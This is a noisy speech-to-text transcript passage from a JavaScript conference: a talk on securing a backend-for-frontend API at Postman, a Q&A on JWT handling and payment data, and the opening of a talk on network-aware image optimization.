act as an orchestrator of various things making it much less performant. In order to alleviate this problem. The back ends for front end servers or gateways came up. These are just API gateways designed to act as an interface between client and a server that which consists of multiple multiple internal services. So they just sit in between and act as aggregator for all the information. So again the client has just one server to talk to this abstract survey all the internal implementation details of your servers and services from the client making it much more performant as it reduces the network chatter. It has less HTTP API calls to make at the same time less network overhead. But this kind of service the BFF brings with itself a different kind of security problem and various security concerns. What all can we think about just out of your mind? It is a single point of failure and by extension a BFF is a single point of attack. It has to it has to be a public facing service since it is open for everyone to view. So you have to implement certain authentication mechanisms. You might also be dealing with user input. So you'll have to validate it and all these are pretty ad hoc and so is there a generic way in which we can quantify these concerns for an API in our case a BFF. It turns out there are very broad parameters described for evaluating security of any given system and most of you might already be aware of this first of them being confidentiality meaning the data is only available to authorized users and not being leaked to someone else who is unauthorized. Then we have integrity mean the data is not tampered with by unauthorized sources and finally we have availability meaning the data is available to authorized users when they want meaning you are able to access things which are allowed to as in when you please now these parameters give us broad thinking silos under which we can think about security of an API specifically and in our case a back-end for front-end. So to better understand the BFF let's break the entire service down into four individual modules one of them being service inbound platform and outbound. We'll talk about these individually and see how we can secure each of these modules and think about how they all combine together. At the same time, I would also like to tell you about what things we did at postman to build a secure back-end for front-end for our web application. So let's start with service, which is where all your server side logic resides. This is where you or your controllers will decide your business logic for the BFF will be there a request first hits this module and you would think that if the request is hitting this module that obviously we'll have to perform some sort of validation but not all validations can be performed on a BFF only ecosystem level checks should be performed on such a service. Now these include checking whether request has valid authentication if it has proper request structure or maybe if sanitize certain headers for you, but but all the business logic specific checks say for example, can a user comment on this specific document? All these checks are handed over to a specific microservice which is responsible for this specific case. But for some of these validating functions, you might be calling third party services or maybe your internal microservice. For example, if you want to check for odd, you might be calling odd zero. Maybe Google dot com to verify is is the given request authorized or authenticated and all these services which are called before a request hits your business logic constitute the critical path and this critical path the length of this gives you a rough estimate as to how complex the validations are on your BFF. It's generally a good idea to keep this short and also have necessary fallbacks for non essential services, keeping your BFF much more available and at the same time much more performant. But how do you write these validating functions? I keep talking about these red blocks on your screen and for that the principle of least privilege comes in very handy very for any action a user wants to perform. You give only the minimum resources required. This means that you start off by giving no permission at all and assume that the user is not allowed to do this and then for very specific conditions allow this action to be performed. So let's take a very trivial example to understand this. So you are building a function called has access. It takes into arguments user and the owner, which is the user and the owner. And the job of this function is to check if the given user has access or not. So the first thing you should be doing in any such function is return false that by default user does not have access and then start adding one by one your cases saying, Hey, is the user an admin? Then okay, allow access is the user the owner. Then also you allow access. So what you are doing is that only for these two specific conditions, you are allowing the request to pass through and and for all other cases, it will fail over to a false case. Now this is called a fail early or a fail first approach of writing functions or writing any sort of code. And this also prevents against data corruptions like say for example, the is admin is not an is not a Boolean, but it's undefined in that case. It's also it will fall through and return false protecting your internal business logic against unauthorized or even malformed requests. Now this was a very very contrived example. Let's look at a much more involved example which has a sample BFF and see what we can do. So here I am in a simple server which has multiple routes which might happen in any public service. So it has certain open views which are the dash the landing page signup page login which have to be open. It has certain dashboard pages which are only allowed for authorized users certain API endpoints and finally certain redirects and this is how any standard public website or an API will have so and everything is open right now. I can just refresh it and see I can I do get everything what I have that is because in the functions with check for access nothing is defined in this file. If I write all my validating functions, they might be middlewares, they might be certain accessor functions. So we always start off by writing for any route or for any endpoint you hit you return false. That's it nothing else refresh forbidden. That means you start off by putting the maximum restriction any endpoint you have in this API will not be authorized and then you start off by relaxing constraints. So for dashboard that is a dashboard controller. Sorry the entrance which is open to everyone you say any anything within the entrance controller or in the entrance page you allow everyone because it has to be open your pub your website has to be visible. There you have it. I can simply click on login type a sign in but still I got forbid I signed in the password was correct. The username was also correct, but I still haven't explicitly given permissions to users who are signed in. So let's do that. So for the dashboard which is our signed in page we say any request within these this dashboard module will be or controller will this is not a Boolean answer this you cannot say allow or disallow you have to say check for login and for that I've already written a helper method called is logged in and this will check for anything within the dashboard and I'm also copying it over for the account page saying that you allow all logged in users. So I refresh it. I try to log in again password and sign in and there we have it our page but when I again when I try to go to the team section I haven't explicitly given permissions and you know the drill by now for any new endpoint or any new route or set of routes you add you start off by giving applying maximum constraints. So for the team controller apart from checking if you are logged in or not you also check. I'm sorry is logged in. You also check is super admin meaning all the routes in this controller that is team are only allowed for admin users but for some of these things they might be only available for everyone. So that's a team information should be available to all the users and for that we relax constraint for that specific endpoint call it info and say for this endpoint you relax to just is logged in. So what you see the drill by now is that you start off by putting the maximum constraint thing don't allow anything and relax for only specific endpoints which use Dean necessary and by this way you are protecting against a developer randomly adding a endpoint and forgetting to add correct access control. So this very this idea idea of differentiating the access control from my business logic. Remember I never touched my controllers. All I did was touch my policies which are accessor functions and nothing else was changed is highlights the fact that you need to use your architecture of an API as a forcing function. What that means is make it harder for your developers to be insecure one of the way in which we do this at postman is to separate our entire business logic from access control. You saw a very tiny example of that. We also leverage our platform or our framework. So at postman we heavily rely on sales. Yes, which is built on top of express and provides this concept of hooks wherein you can augment the framework itself to improve functionalities. So we implement things like auth hook which takes care of all the authentication requirements for a specific API. So and all these things are baked in whenever a new service spins up. So the developer when starting to work on doesn't have to worry about all these small litigaties which may fail or which where a developer mistake might be very critical. It also comes in with all the dependencies bundled in. Now a very important fact to note is that you are not going to write all your code. You are going to reuse a lot of modules. Maybe npm or from yarn. It is crucial that you start off by using strict versions for whatever dependencies you use. So you verified your app and checked for security with 0.1 of let's say version 0.1 of request module and you are guaranteeing security for only that specific version. It should not be deployed with point one dot one because it may or may not have a security vulnerability which you are not even aware of. So you strict file versions and also lock files to ensure prevent deep dependency updates. But it might be possible that you checked for 0.1 today. It is completely secure, but tomorrow a security researcher came up and said, hey, there is a huge vulnerability with this and for that you constantly need to monitor whether your dependencies are vulnerable or not. And for that you use tools like nsp npm audit which is built into npm and also snick which we use to for our source for dependency analysis. So here's a sample snick test command. It just checks all your dependencies and it gives me a list of saying, hey, I find two of these things here which is medium severity vulnerability. It tells me it's a read us type attack. You it is introduced via some package and you can do this to resolve the dependency and this is integrated into our CI pipeline and run on every branch build, meaning that even in case the developer wasn't aware of certain mistakes or certain vulnerabilities in the dependency, it will be easily caught and you can take the necessary steps. So this was one way of enforcing security while building something. There are other ways which we do it at postman and one very simple way which is often overlooked is linking for security. Let's take a very quick example and understand. So here I have a link which is external because it has a target underscore blank now. This is unsafe because the external tab which is opened has access to my current tab with the window dot referer object and can redirect me to anywhere else making it insecure. So linter catches this and tells you that hey, this is not allowed. You need to add rel no opener no referer to make it to prevent the open tab to have access to your current tab. These are very simple mistakes extremely simple mistakes which are easily caught by linty not using eval or certain function function types which prevent you from making small mistakes and they go a long way in securing your application. We have system tests to ensure configuration of critical packages. Let's say if you're using an odd package which has to be configured in a certain way. The system tests are extremely thorough and very fine to the last detail if that package was configured correctly and any change in this system test acts as a red flag for our code reviewer saying that hey something major was changed here. Be very careful while you are reviewing this and finally we have e2 a test for security especially using postman collections. Oh, let's let's take an example of how we do that. So I'm back here in the postman app and these things yep we are using the same BFF which we started off with if you remember I added certain policies which were here. I added these policies which check for certain access. Now I have built a security collection which is reproducing a user information leak. So let me just maximize this for you. So what I'm trying to do here is I'm logging in with user ID for then get trying to get information of user ID for using this API endpoint saying API slash V1 users user ID to our user ID for and I'm then also trying to fetch user force information that is the difference that I'm trying to fetch information of two users. I'm authorized as user for but I can only access user of user force information not someone else. So let's go ahead and test this new man run security collection. So now it complains saying that hey, I'm trying to access user force is trying to access user twos information and it should return 403. I wrote these tests here in the test script that I'm trying to that I should check for a specific response code. These tests can be much more complicated. That means this is an actual failing test case provided to me by anyone in my team saying that hey, this is a bug. This is how you reproduce it. Go ahead and fix it. So let's do that. So the problem here is that instead of taking the user ID from the path, we take it from the authentication mechanism. So we also we verify that say for account the user should be logged in at the same time. It should have the a valid user ID that this will check the user ID from the path and compare it with what we have gotten from your authentication method. And when I try to run it, it should pass because now this is where you have a failing test case. You fixed it and you integrate this command new man run collection. It's just running a collection and integrate that into a CI pipeline as a regression test making it very easy for anyone inside our team as well as people who work on who are not a part of our team building the BFF to give us a failing test case reproduce an issue which can be easily integrated into a regression testing pipeline. Now this was all what we discussed were writing the code on BFF on an API, but a major chunk of a BFF is to talk to internal services, which was its core purpose and the first hurdle in this case is to handle authentication for internal services. Now some of your services might have basic authentication. Some might have token authentication. Some might rely on cookies or everything in the world, but all these things are abstracted away from the developer and especially from the server side code. So here's a sample snippet from one of our controllers. So instead of developer manually specifying the base URL of the service and the authentication mechanism, all they do is they provide the service name, which is service or which path to hit and what queries to pass. This abstracts away all the information about authentication. Information about what is what are the internal implementation details of those servers and also prevents accidental leaks. So when I was querying a service without this abstraction, I might there is a high chance of me either logging that internal auth mechanism or also returning secret secrets via my API endpoint. It also allows for easier secret rotation since your service server side code does not care about how you're authenticating. It is taken away. You can rotate your server side secrets without even touching your server side code and when you're dealing with all these services that authentication as you have learned in previous talks that authentication is just not enough. You also have to validate whether a person is authorized to perform something. So for that we tag each request coming to our BFF and sent on to our internal micro service with a certain token. So here our BFF is adding a sample token. It might be an access token or a session token, which allows the internal service to identify that who is the user performing this action and what other checks I need to implement in this case. For example, only admins can remove users from T and this token allows the internal service to get the user information check whether they are admin or not and allow or disallow based on that this helps us in preventing a major class of vulnerabilities which fall under the name IDOR. It stands for indirect object referencing. This happens when you expose internal object references like let's say auto increment IDs along with incorrect or inappropriate access control checks. We saw an example of this when I demo demonstrated user 4 trying to access user 2's information. So here it's the same example that the user is authenticated ID 1 2 3 but since the API does not have valid checks, I also was able to obtain user 1 2 4's information and an attacker can enumerate through all these keys and there you go. You have had just had a major breach. So these every user action needs to be validated against the token which you have passed. So in this case, it would mean that verify the user ID in the query path the path is the exact same we fetch we get from the token preventing this issue. And apart from preventing user leaks, you would also be logging a lot of things because this is a BFF. It talks to so many internal microservices. You might need to log it for analytics. It might be for let's say debugging purposes and since you might be dealing with user sensitive information, maybe or the password, email, maybe credit card information, you have to scrub your logs for sensitive information. And of course it is expected from developers to not log information, which is considered sensitive, but we also have heuristic functions in place which redact certain information from the logs. So here we have a service a which is trying to log authentication that is the token ID, but instead our functions okay, our functions try to functions detected that hey access token is trying to trying to be logged redacted completely and don't do it. This allows us to also trace our logs throughout our internal network. So we attach a trace ID with the request originating from the BFF and then trace it throughout our internal microservices infrastructure giving us a track of potential PII movements, which is personally identifiable information. Since this is a user service, any service you call might also be dealing with user information and you need to check that they are also in compliance with the rules and regulations you follow. So this was all about building your server side code that you wrote your logic in certain language. You talked to internal microservices using certain practices, but at the end of the day, you have to return all this result to the client and this is where our traditional security terms come in STTPS CSP SRI and I'm going to skip over all that and just talk about two specific things interesting things about we learned while building a BFF at postman first of them being STTPS when switching to STTPS you will always be choosing a type of certificate. Your cloud provider might be giving a default certificate. You might also obtain a free certificate from services like let's encrypt. They provide domain validation, but these certificates ensure that the domain you are seeing in the URL, the data served by them is exactly what you are getting. However, they do not validate the intent of the content. So you can be served malicious content over a secure channel and if you want to instill more trust. So let's say you are building a very critical payment service. You might want to instill more trust in your users and for that you might opt for extended validation certificates where in your organization is also validated by the certifying authority and the user is given more information saying that this company was authorized and when you are transitioning to STTPS please ensure and constantly monitor that all your requests and everything are tagged are over STTPS and they are not and they are not falling back to a insecure channel. And finally, once you are verified that everything is done, you can opt in for a stricter saying that HSTS my service is only allowed over a secure channel and be very careful while doing this. You might end up in a place where if you want to downgrade to STTPS for something and you have preloaded into browsers, it will be very very difficult to fall back. Now once you have sold secure content and ensure the user that this hasn't been tampered with you. You also want to see that only specified things are allowed to execute in your application. This is where content security policy comes in. Now it provides a whitelist of things saying that only allow things from these sources to execute and don't allow things from us when you start implementing CSP always start by implementing in report only mode. It helps you a lot in this mode CSP won't block anything. It would just report to a URI you provide saying that hey, these violations were reported and then you will never handle and then you won't have to worry about side effects. So for example, you might be using services like Google Tag Manager. They inject JavaScript dynamically and you might break your entire analytics pipeline. If you disable blindly all inline JavaScript and finally you need to be very careful that I understand that CSP isn't an ideal candidate for data exfiltration. Once there is malicious JavaScript in your server or in your application, you cannot rely solely on CSP to prevent misuse of that attack misuse of that data. For example, link hrefs are not covered under CSPs and there are a whole other plethora of security headers which you can refer to and pick and choose what suits your needs and what you need to do. But in all these jumbled words and headers which you need to use one thing which is which stands extremely crucial is that all of these checks are dependent on the browser. The client is using so if a browser does not support CSP all your fancy rules are going to go down the drain and they are definitely not a replacement for careful input validation and output encoding. You have to be very careful while taking an input to your server sanitize it and do the exact same when you are showing it to the user and this completes building our application layer. We built everything securely. We we took care of in internal validation outbound so the talking toward internal services and also showing it to the client. But we are going to serve all these things over a platform. It might be AWS Azure or Digital Ocean and since you are not exactly building a server from scratch from actual hardware you are configuring certain third party services, which mean that you have to have constant audits and automation to protect your cloud infrastructure. So what do you audit you audit for developer access saying only a set defined members are allowed to do certain things you check for configuration when you set up things saying am I setting up with the appropriate values is it insecure in any way and also ensure that resources are created with reliability when they are when they are done over time. So it's a you are creating various instances you need to ensure that those instances are created reliably and securely every time for that at postman we use our collection runs to create resources with extreme confidence. So once if we have guaranteed that we have created a database securely a collection run guarantees that it will be secure in every future run and we also monitor these configurations every time using our monitoring service and keeping a track of what exactly happens and if anything major is found missing or something is misconfigured we are notified and then we take appropriate steps. So let's take a look at how we perform one single audit with with a collection. So I'm back in the postman app and I have a collection ready for you which is AWS MFA audit. This collection does one simple thing. It lists down all all the user in your AWS team verifies if all of them MFA enabled that is two factor authentication enabled and so I just go ahead and run this collection. I will choose the appropriate environment and then say run. Now this will call the AWS API with your access token fetch the users. I hope the internet works and fetching users users. And it won't return because if the internet does not work you won't be able to list users but ideally what you will have is if you open the runner you will have a result like this which is already ready for you which tells me the last line saying Ankit underscore M should have MFA enabled which is exactly what I want. I want to verify that all users in my team have MFA enabled this keeps on running constantly and if anyone does not have to MFA enabled we get a slack notification. We notify them and everything is good. One other thing which we ensure in our platform is help check once your service is ready for deployment and before it is being served to actual live traffic in production. We verify for mission critical information. This might be things like keys environment variables BB consistency your cash consistency all the things which you know might affect the availability of your service and in our applications we have a bootstrap test which performs all this and if anything fails in this a step we just go ahead bail out and prevent the deployment and if it everything looks good then yes you are allowed to deploy and however this is used as a last step of is the last line of defense preventing against major mishaps and it is definitely not to be used as a testing mechanism for anything. So you all built you we all talked about about each components which come into building a secure back-end for front-end. We started off with the service handle validation in in bound where we talk to our internal microservices ensure that content was served securely to our clients and also secured our platform which serves all these resources but we it's not a one-time thing that you do all these things once and forget it you need to ensure that these things are continued and your application stays secure over time and that is where you we perform certain software. We follow certain methodologies to ensure that our services stay secure. One of them is tracking security KPIs KPIs stand for key performance indicators and one of them is CVS scores of the vulnerabilities we detect. We track them throughout our versions. We see how often we are repeating our mistakes or are we repeating our mistakes? How long does it take to fix a issue reported by users or maybe someone from our team? It and also keep a track of issues reported by services like hacker one which are where security researchers try to break your app and these are tracked throughout our versions giving us a very quantifiable metric that whether your BFF was secure or not or has it dwindled over time or has it become more secure over time and this is all handled in a step called VAPT stands for vulnerability assessment and penetration testing. This is a post development step where we're in once a build is ready for production deployment. We send it to our security team. They perform certain tests on that it might be white box or black box testing and try to find vulnerabilities or security issues with the build if they find any they suggest changes to us and we make them change make changes and send it back again and once it is cleared by them it only then it is allowed to go to production and this step it also exists in most of the companies and is a very tedious process and very manual because the the engineers have to manually try for every keeper track of all past all past bugs re try them again saying have you not have you don't regressed for something but at postman we automate all these things using our collection runs as you just saw I demonstrated three different ways to check for various things now any bug you find let's say a user information was leaked a collection is created and is automatically run whenever a build is sent to the security step keep making process much more faster and also reliable eliminating human error from this and all these things building a secure platform a secure API layer and following some proper software methodologies ends up in building a secure API or a BFF in this case so we started off with if you remember we started off with certain security parameters saying that we want to evaluate security of our BFF under these parameters what all did we do to achieve those things to achieve confidentiality we we ensured proper validation using principle of least privilege we scrubbed our logs using various heuristic methods to ensure integrity we made sure that every request was tagged with user information so that we prevent IDOR attacks and leaking informations about other users and also implemented content security using various headers and finally to ensure availability we kept our critical path extremely short meeting our BFF is much more performant we performed constant platform audits and also consistent health checks to ensure that a bad release isn't pushed out to users and all these things combine to build a secure API in general and this is what you need to take care while building anything that your needs might be different from our needs a certain things you fell right for us and we had certain use case in mind but your API or your BFF might not have those constraints or might not have the same use case so what you need to understand is what security considerations you need to take care while building each module of your API and also keeping in mind that it is a gradual process you can't wake up one day say though today I'll build my API secure it's not going to happen in a day it will happen over time where you constantly monitor for things you measure things and ensure that your API remains that way throughout the period of time and finally it is it is very very interesting and very philosophical to say that security is ingrained in you but small mistakes which you make like say using eval or using unsafe links they go a long way in destroying the security for an application so while developing make sure you take care of these small mistakes you ingrain security as a part of your development process and don't wait for QA or security engineers to tell you that this is wrong which goes a long way in building a secure and also reliable back end for front end. Thank you very much. Do we have time for questions? Let's have a joint Q&A. Oh yeah, there's a joint Q&A. So, so seed first four speakers Siddharth, Arnav, Shyam so this is like a joint thing obviously so joint means where you guys can ask whatever you have and either of the four can you know we have runners here who will hand over your mics. So, if you have any questions for all four of us, you are free to ask at this point. Hi Shyam, so considering all the talk about security so what I want to ask it as users of a website or users of an app so apart from like ensuring its HTTPS and everything else so what are the other things we can look for before like trusting a website with our credentials. So you're talking about you trusting a different website with your credentials? Yeah, as a user not as a developer talking as a user. Good luck with that. If you figured it out, let me know because other than relying on the company and their background and how many people they have, I haven't found a good metric and even the best of websites like the LinkedIn and the Google of the world have had leaks at different points in time. So simple thing to do minimize the information you give use single sign on using some other provider that you can trust and don't reuse your passwords other than that. I have no other better tips maybe one of you guys do. Hello. Yeah, my question to Siddharth that when you talk about security and especially when JWT you talk about so everything you write in in client side in JavaScript if you want any token you have to write code in JavaScript and how difficult it is to pass the JavaScript in a browser itself and get all the information. Um, are you saying how difficult is it to capture the token on the client side? It's super easy. Yeah, it's like if you use a Chrome extension, if you use a vulnerable npm package, you should always assume that the client side token is already gone. So, so when you talk about JavaScript and security, then how it will be secure when you write everything in JavaScript, how can we make it secure? Okay, um, I can give you like a one minute revision of my talk because that's basically my talk. Um, the idea is that in the token don't store anything that you don't want people to see. So don't store credit card information, no passwords, no cart information, even only store things that are required for the session, right? So who is this person? What's his ID? Um, admin through user role, et cetera. Uh, the goal with token that leaves JavaScript web token JSON web tokens is not to hide that information is to verify that this information is is legit, right? So it comes from the server to the client and goes back to the server. The goal here is to make sure that it's not tampered in between. If it's tampered, you'll get to know that's the thing it tries to solve. So it's not hidden. It's just, uh, verified. I guess why man in the middle cannot get my private key when I'm sending it back. So while doing the authorizes, the idea is that I'm sending my private key privately to my client. No, no, never, never, please don't do that. You're only so you're on the server on the first authorization server. You're using the private key on the server to create a token and now you're only passing that token. The token has a signature which was created with the private key, but you don't pass the private key. You only pass the token. So let me rephrase it in the shared key system where the key is available to both. What happened that time? Oh, so. Okay. It's like saying you and I have a secret, right? We have a we have a pseudo language, right? That we've created between ourselves now and you're the authorization server. I'm the API server, right? He's the client. Now we can talk in our own code language and he wouldn't understand because he doesn't have the shared secret. You would understand because you have the shared secret. When you tell it to me, I can understand because I have the shared secret. But while we talk in this room, even though other people can listen, they don't have the shared secret because that doesn't go through the client. It only stays with you and me. The secret is not never in transit. Yeah. You have built both the servers, right? So you just keep the secret in both places. It's never in transit. It doesn't travel through the client. So this is regarding like how we build front end and back end in our system right now. So when we use JWT is right, like you will have to store in front end in order to like access the station in the later point, right? So one way is like you said, like local storage other ways, like storing in a cookie, right? So when you're storing specifically in cookie, like one way to secure that is of course, like whenever I like receiving the information, I should sanitize it. Another one is like to set expiry date to it, right? Is there anything else like also like setting HTTP only to true, right? So this has a way that I can secure my cookie, but is that is it enough to secure storing like JWT in a cookie or should we do more on the top of that? I guess he can answer your question about cookies. Right? I can answer that. Sure. I can answer the local storage part or the in memory part again, because you use a bunch of npm packages and a bunch of client site Chrome extensions, they can hypothetically grab your token as well, right? So that's why you can all like you should always assume that the token is going to get leaked and all of these things that we talk about setting the audience using the right algorithm, putting expires are only frictions that you add so that the hacker has to do more work, right? It's like the more friction you add, the difficult it becomes. I wouldn't say it will ever be full proof. I would add a very general point to it is that I mean something like say cookies just set it and you know that I mean anybody can read the cookies, but beyond that, like trying too many stuff. For example, like there is a excesses header field that you set on HTTP. It actually introduces a vulnerability in IE eight supposed to remove the vulnerability on other browsers. It introduces it because zero and one is swapped on IE eight. So I mean, don't do a lot of extra stuff to just make things extra secure, especially like on the client side. I mean, just think it's already exploited. Just don't like try 10 different things. You'll probably introduce some extra vulnerability. If you try something fancy on the client side, is there a way to invalidate JWT other than the expiration time? So it won't remain stateless. Then it will maintain a blacklist of that. If or you can change the private key and then everybody is logged out. These are the two ways that we usually do any other way. Use them like cookie store them. You don't get one server side logouts. Then JWT is not your option. Like JWT has a like application layer kind of thing where it is very useful. Like I was mentioning in my talk, like we use JWT is a lot in our applications, but we don't use it in our server because there are places where you want to do server side logout. You probably don't want to use JWT there. JWT token invalid or like rework the token. Like I'll tell you the basic example like scenario where we have a customer already logged in. So on his local system, we do have the JWT token, right and from admin he he now changed the customer status as like no longer valid, but the token is still stored on his local system, right? So he still will be able to access that. So how we can like handle this situation with JWT? I guess the first part of it was covered by invalidating JWT tokens, but the second information is what you store in a token. So this transient states like is a server is the client active or not? Or is something is the user allowed to do it or not? Should you really? The question should you really store it there? If you can do it on your back end and store it in your database and find out whether and change there. So you don't have to invalidate it instead. The state of the user has changed from let's say active to inactive or maybe let's say deprecated or whatever. So you you provide a way for user to say that I am this I am giving you my certain things, but on the server you figure out what is the state of this user and not not exactly push everything to the client side. I guess I'm just going to say everything in one sentence. If you want remote low if you want remote logout, don't use JWT, don't use stateless sessions. You want something that is stateful either use a cookie or just use JWT like cookie. Also in addition to one thing, I mean like maybe a general question to you guys just to clear your mind, say you have a JWT and you have the username inside it or say your server allows changing usernames. Okay. Now the user changes his username and you get an incoming JWT. It's valid because of course it's valid. It's not expired. So if you look at the username, which one would use a source of truth? The database or the JWT? I mean, I hope that answers the query for everybody. Right. The JWT should not be like the source of truth. It and it should not. It should only have very nominal identifying data. So if some data has changed on the database, then your source of truth has changed. So that is also another way your JWT is actually not valid anymore. I said, uh, so my question is again with JWT. So the way I used to do it was, uh, I used to send the JWT after the user would log in, you know, and then I would store it in local storage. So that today I got to know that that's not a good idea. So how do you take care of the flicker, which happens for the first time? And, uh, you know, when, when I want the session to stay, even if the user closes the tab, if he reopens the website or the application, the, uh, I mean, the API's work, how do you like ensure that if I keep expiring the token again and again and again? So every time you expire the token, you also recreate a new one. Yeah, I get that. But, uh, after, uh, say I expire and then, um, uh, I closed the tab, I reopened the tab, then there's a flicker. How do you prevent that? I have faced it. Maybe it's a, I don't know, like maybe it's a simple solution. I do not. Okay. So your use case is basically you want the token to be valid for longer. You don't want it to expire in every five seconds because yeah, but if I, if I do not store it on the local storage or a cookie, then, uh, how do I check whether, you know, the first API call after the, you know, user opens the tab, there's one first API call with the token, right? Oh, sure. So, um, there are a bunch of libraries that do that for you. Like odd zero JS does that for you. It uses local storage literally to keep a key essentially that this is the user for, um, your service like odd zero and then it using that key, it gets a new token for you. So it's like either you have to ask the, uh, end user to input his credentials again and again, or you have to store something locally in something like local storage or cookie that you can use as a proxy of that. So it's like saying the token can be what do you say you're avoiding man in the middle attacks by keep deleting the token, but you're still vulnerable to things on the client with a Chrome extension or something. Right. Okay. Thanks. Uh, so I also add one thing that this is, uh, I mean, you either design your system with a refreshing mechanism in mind or you design it without that. If your system has a refreshing mechanism, it should not matter whether you refresh it every five seconds or every five days in the refresh should work either case. I mean, it should work after expiry kind of refresh. Also, you should have, or you completely don't have refresh then people just log in every time. I mean, there's like, there's not going to be any middle ground around that. Some refreshes work. Some don't work kind of thing. Hello. Uh, my name is I think it, uh, my question is that when we are now, how do we secure interaction like sending sensitive data? How do we secure that? For example, like great car details at all that like JWT we understand when we said that we don't store and we don't use it for transmitting secure information. But when we are in a situation like that, we're in, we have to send users create car details with CVV both and everything. So if anyone takes that, then it's completely like the user will lose trust on the company and the size. So that is my question. How any suggestions? How do you make that secure? Thank you. So when it comes to critical data, right? And payments is definitely one of them. There are a few things. So one HTTPS well tested, not prone to man in the middle as such, then you have secondary level. So there are on the server side, you have PCI restrictions on what data can be stored, validated, logged, so on and so forth. There's also additional things that you do, especially if you use a payment gate, where things like that, you'll see that they ask you to encrypt it with a public key on the client side, send a request token, which they can validate to make sure that the request itself was not intercepted or tampered. So those kinds of cases, those kinds of cryptographic hashes and signs using public keys and private keys on the server to validate it, that makes a lot more sense. And that's really your best case for that. Anybody uses a cloudflare to provide SSL to their website or like any other DNS provider to provide SSL proxy based SSL anybody's using? Yeah, so your your actual backend is running on HTTP and cloudflare is providing the HTTPS part. Anybody has a setup like that? Well, then man in the middle already happening right there. So I'll give you an example. There was once a takedown request like I just know it through a friend, I don't want to name the company. They had a takedown request and like on a particular URL. So government actually does takedown request in particular URLs. ISPs actually cannot do that because if it's a HTTPS you don't know the rest of the part of after the domain. So ISPs cannot actually take down a page. They can only take down a website. So they usually refuse to take down the website. If the request is only for a particular URL when the government found out that the actual server was running on HTTP on a Airtel data center. So they just requested Airtel to block it from behind the cloudflare part. Okay, so I mean if you're using SSL then it should be your SSL certificate. It should not be the cloudflare kind of system. Then I mean somebody can just directly reach your data center and do meet them there. Okay, we'll cut the questions here, but don't worry. You can come to the speakers talk personally to them. Wow, nice. So we've had like three security talks now apart where we shift a little bit of focus from security to other parts of JS. So how many of you have tried or have managed to install or you know, implement service workers in production? Okay, this is nice. My friend has a very worst experience like he set up a service worker and he cannot update the site. So he has, he had bought a new site in order to update the service workers. So you end up buying another domain just so that the update works. So our next talk is by Rahul who aspires to be a DJ and play at Tomorrowland one day. So maybe if we do something like this, he'll be able to relate to it. So Rahul, the stage is yours. This is working, right? Yeah. So hello everyone. We are on time. So I guess we're on time for lunch as well. I'll try to wrap it up so that you're not late for that. And I am Rahul. I'm co-founder at imagekit.io. It's a relatively new product. I'm sure not a lot of you would have heard about it. But then what we basically do is real time image optimization and transformation. And today I'm going to talk about something which as you know, a lot of people have come up to us and ask that, you know, how do we optimize images based on the user's network, right? Let's say if the user is on 3G or if he's on 2G, how do we change the image that we are sending to them? And consider typical case where, you know, a e-commerce website loads hundreds of images on the website. They would want to up to some kind of optimization for the users who are on a slower network. So that is what we're going to discuss that. How do you optimize images on the basis of what network the user is on? And yes, I am from imagekit and I would be using imagekit because you know, this is a sponsored talk. You would have read in your schedule, but then what we discuss can you can implement that on your own as well. You can use any in-house solution that you might have for images. You can use any other third party that you have for images and not just images. You can in fact apply what we discuss to other more critical parts of the application, which is a JavaScript in the CSS. You can optimize those as well on the basis of the network. Right? So let's get started. This is a rather interesting start and I guess most of you, you know, who have worked on front end would be aware about this that all the new users that are coming on the internet are coming through mobile, right? And globally that's 55% of all users are coming from mobile in India. That's a slightly higher percentage at 78% mainly because of cheaper handsets, cheaper data plans coming in with geo and Airtel, right? And why am I talking about mobile, right? When I'm talking about service workers because network speed is actually a problem on mobile devices and not, you know, you guys work in your offices and you have a very stable Wi-Fi or a LAN connection. You do not have network problems there. The network problem is on your mobile devices. For example, if you step outside your building, you move into the lift lobby or let's say you move in the basement parking, your network speeds would drop, right? So our ideal target audience for this is people who are using mobile and that's a big chunk for all websites. Right? And we often believe that, you know, with geo and Airtel and everyone coming in our users, you know, they have a great 4G speed or a great 4G network. But the fact is not right. We did this study with one of the companies that we work with 91mobiles.com. What we did was that Chrome exposes the downlink speed, the estimated downlink speed that the user is observing at that time and we tried to measure that. We did that for a lot of users over the million users and this is what we see that almost 45% of the users have a speed lower than two Mbps, two megabits per second. And in fact, almost 25% of users have a speed less than of one megabit per second. So you can. So we assume that our users have a really fast network, but then the reality is that they do not, right? And contrary to this, in the last six years, our page sizes have gone up by three times. And the reason is that, you know, we started pushing a lot more JavaScript code with the client side rendering happening. We start pushing in lot to the client videos have gone up in the last last year, right? So our page sizes have increased our assumption that the network has improved stays. But then the reality is that the networks have not improved as much and the result is that our users end up with a frustrated experience. They might not even come back to the website. Right? I'll go back to the previous slide. I just wanted to focus on the green bar that is there at the bottom that basically corresponds to images and I would like you to notice that images still correspond to about 50% of the page weight, right? Videos are coming up, but the images are still the major component in the page, right? So this this makes it very clear, right? That up until now, we have been able to modify our website and our content on the basis of let's say the user's DPR or let's say the user's device with we have made responsive websites, but then not a lot of us have worked on optimizing the website on the basis of the network speed and that must change, right? We need to stop building for ourselves. We need to stop building for people who are there on a Wi-Fi connection and can load our website really fast. We need to start thinking of users who are not on a very good stable connection and we need to start building for them, right? And our target in the stock is we are going to be focusing on images. Reason being that like like we observe that they still form more than 50% of the page weight. Plus the other reason being images are the lowest hanging fruit to be honest, right? They might not have as much impact on the overall page load time as you know, optimizing JS or CSS would have, but then that they are the easiest ones to optimize and they are the easiest ones to start off with and but then you can apply this concept to any other content on your page as well, right? So now we have two requirements. One is that we need to determine what network the user is on and detect when that network changes. And the second requirement is that when the network changes, we need to change the image size that we are sending them, right? So we look at the first first part, right? How do we detect network changes? So Chrome and Chrome mobile that is what I recall from from what I last read have implemented this network information API. What this does is it observes all the all the downloads that are happening in the browser and it tries to estimate what kind of network the user is on, right? And it exposes a read-only value which can be read from navigator dot connection dot effective type. It basically classifies the user into four buckets. 4g 3g 2g or slow 2g. So when I say 4g, it's basically speeds upwards of 3 mbps, right? That's the average it includes Wi-Fi as well. So even though the classification is 4g and 3g 4g would include really good speeds, including Wi-Fi as well. Right? So we do know what what network the user is on. What kind of speeds is he getting right? And 4g obviously is faster than 3g 3g is faster than 2g and 2g is faster than slow 2g. So the logic dictates that right on 4g, which is the fastest network of all we need to serve the largest image size. And on slow 2g, which is the slowest of them all, we will serve the smallest image size, right? That's that's what we want to do now. How do we change image size? Right? We're not talking about changing the image dimensions. We're not saying that we will resize the image and send a smaller image to a slow 2g user. What we want to do is to mince, you know, compress it further, right? Compress the exact same image further. And for those of you who would have worked on images on the front end, 